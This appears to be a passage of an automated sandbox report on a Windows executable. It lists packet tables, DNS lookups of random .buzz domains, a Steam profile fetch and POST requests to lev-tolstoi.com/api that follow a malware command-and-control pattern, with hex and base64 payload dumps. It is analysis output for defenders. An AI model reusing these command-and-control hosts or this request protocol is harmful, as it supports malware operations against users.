                                                                                                                                                                                                                                              Dec 28, 2024 09:56:45.440157890 CET49731443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:45.441698074 CET49731443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:45.441715956 CET44349731104.21.66.86192.168.2.5
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:45.441977024 CET44349731104.21.66.86192.168.2.5
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:45.443161964 CET49731443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:45.443878889 CET49731443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:45.443913937 CET44349731104.21.66.86192.168.2.5
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:45.444005013 CET49731443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:45.444031954 CET44349731104.21.66.86192.168.2.5
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:45.444120884 CET49731443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:45.444159985 CET44349731104.21.66.86192.168.2.5
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:45.444261074 CET49731443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:45.444294930 CET44349731104.21.66.86192.168.2.5
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:45.444412947 CET49731443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:45.444439888 CET44349731104.21.66.86192.168.2.5
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:45.444577932 CET49731443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:45.444617987 CET44349731104.21.66.86192.168.2.5
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:45.444627047 CET49731443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:45.444716930 CET49731443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:45.444750071 CET49731443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:45.491343975 CET44349731104.21.66.86192.168.2.5
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:45.491579056 CET49731443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:45.491624117 CET49731443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:45.491635084 CET49731443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:45.535334110 CET44349731104.21.66.86192.168.2.5
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:45.535725117 CET49731443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:45.535789967 CET49731443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:45.535820961 CET49731443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:45.583329916 CET44349731104.21.66.86192.168.2.5
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:45.583396912 CET49731443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:45.631345987 CET44349731104.21.66.86192.168.2.5
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:45.804081917 CET44349731104.21.66.86192.168.2.5
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:47.937195063 CET44349731104.21.66.86192.168.2.5
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:47.937293053 CET44349731104.21.66.86192.168.2.5
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:47.937352896 CET49731443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:47.937573910 CET49731443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:47.937599897 CET44349731104.21.66.86192.168.2.5
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:47.964694023 CET49738443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:47.964755058 CET44349738104.21.66.86192.168.2.5
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:47.964868069 CET49738443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:47.965250015 CET49738443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:47.965259075 CET44349738104.21.66.86192.168.2.5
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:48.868511915 CET49738443192.168.2.5104.21.66.86

                                                                                                                                                                                                                                              UDP Packets

                                                                                                                                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:24.893279076 CET6125453192.168.2.51.1.1.1
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:25.038608074 CET53612541.1.1.1192.168.2.5
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:25.050343990 CET6075453192.168.2.51.1.1.1
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:25.189775944 CET53607541.1.1.1192.168.2.5
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:25.192960978 CET5748453192.168.2.51.1.1.1
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:25.332601070 CET53574841.1.1.1192.168.2.5
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:25.335802078 CET6196053192.168.2.51.1.1.1
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:25.475446939 CET53619601.1.1.1192.168.2.5
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:25.477482080 CET6415053192.168.2.51.1.1.1
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:25.617038012 CET53641501.1.1.1192.168.2.5
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:25.618978977 CET5665753192.168.2.51.1.1.1
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:25.762442112 CET53566571.1.1.1192.168.2.5
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:25.766927004 CET6420053192.168.2.51.1.1.1
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:25.908227921 CET53642001.1.1.1192.168.2.5
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:25.911825895 CET5359253192.168.2.51.1.1.1
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:26.050906897 CET53535921.1.1.1192.168.2.5
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:26.054369926 CET5791053192.168.2.51.1.1.1
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:26.203795910 CET53579101.1.1.1192.168.2.5
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:26.207211018 CET5852253192.168.2.51.1.1.1
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:26.427820921 CET53585221.1.1.1192.168.2.5
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:28.815592051 CET6122853192.168.2.51.1.1.1
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:28.955377102 CET53612281.1.1.1192.168.2.5

                                                                                                                                                                                                                                              DNS Queries

                                                                                                                                                                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:24.893279076 CET192.168.2.51.1.1.10x4a49Standard query (0)mindhandru.buzzA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:25.050343990 CET192.168.2.51.1.1.10xf002Standard query (0)prisonyfork.buzzA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:25.192960978 CET192.168.2.51.1.1.10x8d72Standard query (0)rebuildeso.buzzA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:25.335802078 CET192.168.2.51.1.1.10x4594Standard query (0)scentniej.buzzA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:25.477482080 CET192.168.2.51.1.1.10xcd2eStandard query (0)inherineau.buzzA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:25.618978977 CET192.168.2.51.1.1.10xa290Standard query (0)screwamusresz.buzzA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:25.766927004 CET192.168.2.51.1.1.10x1613Standard query (0)appliacnesot.buzzA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:25.911825895 CET192.168.2.51.1.1.10xadcStandard query (0)cashfuzysao.buzzA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:26.054369926 CET192.168.2.51.1.1.10xe10fStandard query (0)hummskitnj.buzzA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:26.207211018 CET192.168.2.51.1.1.10x9cd4Standard query (0)steamcommunity.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:28.815592051 CET192.168.2.51.1.1.10xada5Standard query (0)lev-tolstoi.comA (IP address)IN (0x0001)false

                                                                                                                                                                                                                                              DNS Answers

                                                                                                                                                                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:25.038608074 CET1.1.1.1192.168.2.50x4a49Name error (3)mindhandru.buzznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:25.189775944 CET1.1.1.1192.168.2.50xf002Name error (3)prisonyfork.buzznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:25.332601070 CET1.1.1.1192.168.2.50x8d72Name error (3)rebuildeso.buzznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:25.475446939 CET1.1.1.1192.168.2.50x4594Name error (3)scentniej.buzznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:25.617038012 CET1.1.1.1192.168.2.50xcd2eName error (3)inherineau.buzznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:25.762442112 CET1.1.1.1192.168.2.50xa290Name error (3)screwamusresz.buzznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:25.908227921 CET1.1.1.1192.168.2.50x1613Name error (3)appliacnesot.buzznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:26.050906897 CET1.1.1.1192.168.2.50xadcName error (3)cashfuzysao.buzznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:26.203795910 CET1.1.1.1192.168.2.50xe10fName error (3)hummskitnj.buzznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:26.427820921 CET1.1.1.1192.168.2.50x9cd4No error (0)steamcommunity.com23.55.153.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:28.955377102 CET1.1.1.1192.168.2.50xada5No error (0)lev-tolstoi.com104.21.66.86A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Dec 28, 2024 09:56:28.955377102 CET1.1.1.1192.168.2.50xada5No error (0)lev-tolstoi.com172.67.157.254A (IP address)IN (0x0001)false

                                                                                                                                                                                                                                              HTTP Request Dependency Graph

                                                                                                                                                                                                                                              • steamcommunity.com
                                                                                                                                                                                                                                              • lev-tolstoi.com

                                                                                                                                                                                                                                              HTTPS Proxied Packets

                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              0192.168.2.54970423.55.153.1064435856C:\Users\user\Desktop\3LUyRfIoKs.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-12-28 08:56:27 UTC219OUTGET /profiles/76561199724331900 HTTP/1.1
                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                              Host: steamcommunity.com
                                                                                                                                                                                                                                              2024-12-28 08:56:28 UTC1905INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                              Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED]
                                                                                                                                                                                                                                              Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                              Date: Sat, 28 Dec 2024 08:56:28 GMT
                                                                                                                                                                                                                                              Content-Length: 35121
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Set-Cookie: sessionid=f9e54bfcb159df67606b40d3; Path=/; Secure; SameSite=None
                                                                                                                                                                                                                                              Set-Cookie: steamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; Path=/; Secure; HttpOnly; SameSite=None
                                                                                                                                                                                                                                              2024-12-28 08:56:28 UTC14479INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0a 09 09 3c 74 69 74 6c 65 3e
                                                                                                                                                                                                                                              Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><title>
                                                                                                                                                                                                                                              2024-12-28 08:56:28 UTC10097INData Raw: 2e 63 6f 6d 2f 3f 73 75 62 73 65 63 74 69 6f 6e 3d 62 72 6f 61 64 63 61 73 74 73 22 3e 0a 09 09 09 09 09 09 42 72 6f 61 64 63 61 73 74 73 09 09 09 09 09 09 09 09 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 6d 65 6e 75 69 74 65 6d 20 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 6f 72 65 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 61 62 6f 75 74 2f 22 3e 0a 09 09 09 09 41 62 6f 75 74 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 6d 65 6e 75 69 74 65 6d 20 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 68 65 6c 70 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 65 6e 2f 22 3e 0a 09 09 09 09 53 55 50 50 4f 52 54 09
                                                                                                                                                                                                                                              Data Ascii: .com/?subsection=broadcasts">Broadcasts</a></div><a class="menuitem " href="https://store.steampowered.com/about/">About</a><a class="menuitem " href="https://help.steampowered.com/en/">SUPPORT
                                                                                                                                                                                                                                              2024-12-28 08:56:28 UTC10545INData Raw: 4e 49 56 45 52 53 45 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 70 75 62 6c 69 63 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 4c 41 4e 47 55 41 47 45 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 65 6e 67 6c 69 73 68 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 43 4f 55 4e 54 52 59 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 55 53 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 4d 45 44 49 41 5f 43 44 4e 5f 43 4f 4d 4d 55 4e 49 54 59 5f 55 52 4c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74 70 73 3a 5c 2f 5c 2f 63 64 6e 2e 66 61 73 74 6c 79 2e 73 74 65 61 6d 73 74 61 74 69 63 2e 63 6f 6d 5c 2f 73 74 65 61 6d 63 6f 6d 6d 75 6e 69 74 79 5c 2f 70 75 62 6c 69 63 5c 2f 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 4d 45 44 49 41 5f 43 44 4e 5f 55 52 4c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74
                                                                                                                                                                                                                                              Data Ascii: NIVERSE&quot;:&quot;public&quot;,&quot;LANGUAGE&quot;:&quot;english&quot;,&quot;COUNTRY&quot;:&quot;US&quot;,&quot;MEDIA_CDN_COMMUNITY_URL&quot;:&quot;https:\/\/cdn.fastly.steamstatic.com\/steamcommunity\/public\/&quot;,&quot;MEDIA_CDN_URL&quot;:&quot;htt


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              1192.168.2.549705104.21.66.864435856C:\Users\user\Desktop\3LUyRfIoKs.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-12-28 08:56:30 UTC262OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                              Content-Length: 8
                                                                                                                                                                                                                                              Host: lev-tolstoi.com
                                                                                                                                                                                                                                              2024-12-28 08:56:30 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                                                                                                              Data Ascii: act=life
                                                                                                                                                                                                                                              2024-12-28 08:56:30 UTC1121INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 28 Dec 2024 08:56:30 GMT
                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Set-Cookie: PHPSESSID=a3rlk3vei0rtbr6hgt1jq6akbt; expires=Wed, 23 Apr 2025 02:43:09 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                              vary: accept-encoding
                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Da3dfgRjnYdw9dWHr8342mTqG0Mf8KrArFb4D5P%2FZ2zy7xqbZuuH3KMqD3FJNBPu2R1wPyz6Eu2GQVhV6LfH%2FUi2ABCb1HUiLRcmwWPB0g8bMXPiDjoCuuMWU2VRmay2Njk%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                              CF-RAY: 8f905666eadb421d-EWR
                                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1573&min_rtt=1569&rtt_var=598&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2835&recv_bytes=906&delivery_rate=1815920&cwnd=177&unsent_bytes=0&cid=9b48787185fd0059&ts=743&x=0"
                                                                                                                                                                                                                                              2024-12-28 08:56:30 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                                                                                                                                              Data Ascii: 2ok
                                                                                                                                                                                                                                              2024-12-28 08:56:30 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              2192.168.2.549706104.21.66.864435856C:\Users\user\Desktop\3LUyRfIoKs.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-12-28 08:56:32 UTC263OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                              Content-Length: 47
                                                                                                                                                                                                                                              Host: lev-tolstoi.com
                                                                                                                                                                                                                                              2024-12-28 08:56:32 UTC47OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 26 6a 3d
                                                                                                                                                                                                                                              Data Ascii: act=recive_message&ver=4.0&lid=PsFKDg--pablo&j=
                                                                                                                                                                                                                                              2024-12-28 08:56:33 UTC1125INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 28 Dec 2024 08:56:32 GMT
                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Set-Cookie: PHPSESSID=vjh4der4la46fbubj40mr9gonb; expires=Wed, 23 Apr 2025 02:43:11 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                              vary: accept-encoding
                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6YFFIuwCBY8q0xtHMGuXPNooCBlgvuTB6fZZVrWqqx%2B4UVzj58Um5B%2FcDkp92%2BN0MlBnc8kM0IGdnfaIaACeK5Sp98f9uOP16yMI%2BqQgMDPbcQ1mHcyl8tzxUHRybCQ5pFg%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                              CF-RAY: 8f9056737a35efa7-EWR
                                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1808&min_rtt=1799&rtt_var=693&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2835&recv_bytes=946&delivery_rate=1558996&cwnd=161&unsent_bytes=0&cid=bb10daa80234ba29&ts=783&x=0"
                                                                                                                                                                                                                                              2024-12-28 08:56:33 UTC244INData Raw: 34 39 31 63 0d 0a 45 44 7a 67 46 2f 52 79 73 44 51 71 50 50 49 6b 70 71 58 78 39 6e 41 49 4a 63 31 79 2b 54 4e 6c 55 4a 55 5a 44 62 36 6c 5a 35 6c 72 48 70 59 31 7a 6b 61 63 46 6c 6c 5a 30 42 37 53 31 34 53 54 58 43 70 45 71 56 44 44 56 51 51 38 35 6e 77 68 6e 4e 4d 4b 75 79 70 61 67 58 75 48 46 35 77 57 54 30 54 51 48 76 33 65 30 35 4d 65 4b 68 2f 76 46 35 4e 52 42 44 7a 33 65 47 62 52 31 51 76 36 65 46 43 48 66 35 45 52 31 46 56 47 55 5a 64 42 77 38 53 62 6d 42 6c 6c 54 61 42 51 31 52 45 41 4b 72 63 6a 4c 2f 50 41 45 2f 68 64 58 5a 4e 38 31 67 2b 63 54 77 68 5a 6e 41 61 63 68 35 43 54 45 6d 52 44 71 52 6d 52 57 77 30 30 39 6e 31 6e 7a 73 77 42 38 58 68 65 68 48 36 62 47 4d 42 59 54 46 61 63 52 38 6e 45 30 39 70 53 62 56
                                                                                                                                                                                                                                              Data Ascii: 491cEDzgF/RysDQqPPIkpqXx9nAIJc1y+TNlUJUZDb6lZ5lrHpY1zkacFllZ0B7S14STXCpEqVDDVQQ85nwhnNMKuypagXuHF5wWT0TQHv3e05MeKh/vF5NRBDz3eGbR1Qv6eFCHf5ER1FVGUZdBw8SbmBllTaBQ1REAKrcjL/PAE/hdXZN81g+cTwhZnAach5CTEmRDqRmRWw009n1nzswB8XhehH6bGMBYTFacR8nE09pSbV
                                                                                                                                                                                                                                              2024-12-28 08:56:33 UTC1369INData Raw: 2f 76 53 4e 73 43 4e 54 48 6d 61 6e 72 52 31 77 4f 37 62 52 43 62 4e 5a 45 63 6b 67 34 49 56 70 78 49 77 63 53 63 6b 78 4e 71 56 61 41 51 6d 46 6b 50 4e 76 31 30 59 4e 50 4a 44 2f 78 36 56 34 56 36 6b 52 6a 55 57 55 73 65 33 67 62 44 33 39 50 4d 55 6b 70 58 72 42 4f 50 58 42 5a 79 36 44 56 32 6e 4d 41 4a 75 79 6f 65 68 48 75 58 48 64 4a 45 51 46 57 62 51 39 62 4d 6d 70 6b 66 61 6b 71 6c 48 35 68 52 41 44 6a 39 64 47 58 59 79 67 6a 39 63 6c 37 43 4f 39 59 58 79 68 59 51 48 72 4e 44 31 4d 43 66 67 6c 42 51 42 37 42 65 67 68 45 41 50 72 63 6a 4c 39 54 43 42 76 68 35 55 59 46 39 6e 51 4c 53 52 45 35 54 6c 56 54 43 77 70 32 65 45 58 68 4e 6f 52 61 59 57 41 77 37 38 6e 78 72 6e 49 6c 46 2f 47 6f 65 32 6a 57 33 48 64 6c 61 51 6b 6d 51 42 74 75 4a 69 74 51 56 5a
                                                                                                                                                                                                                                              Data Ascii: /vSNsCNTHmanrR1wO7bRCbNZEckg4IVpxIwcSckxNqVaAQmFkPNv10YNPJD/x6V4V6kRjUWUse3gbD39PMUkpXrBOPXBZy6DV2nMAJuyoehHuXHdJEQFWbQ9bMmpkfakqlH5hRADj9dGXYygj9cl7CO9YXyhYQHrND1MCfglBQB7BeghEAPrcjL9TCBvh5UYF9nQLSRE5TlVTCwp2eEXhNoRaYWAw78nxrnIlF/Goe2jW3HdlaQkmQBtuJitQVZ
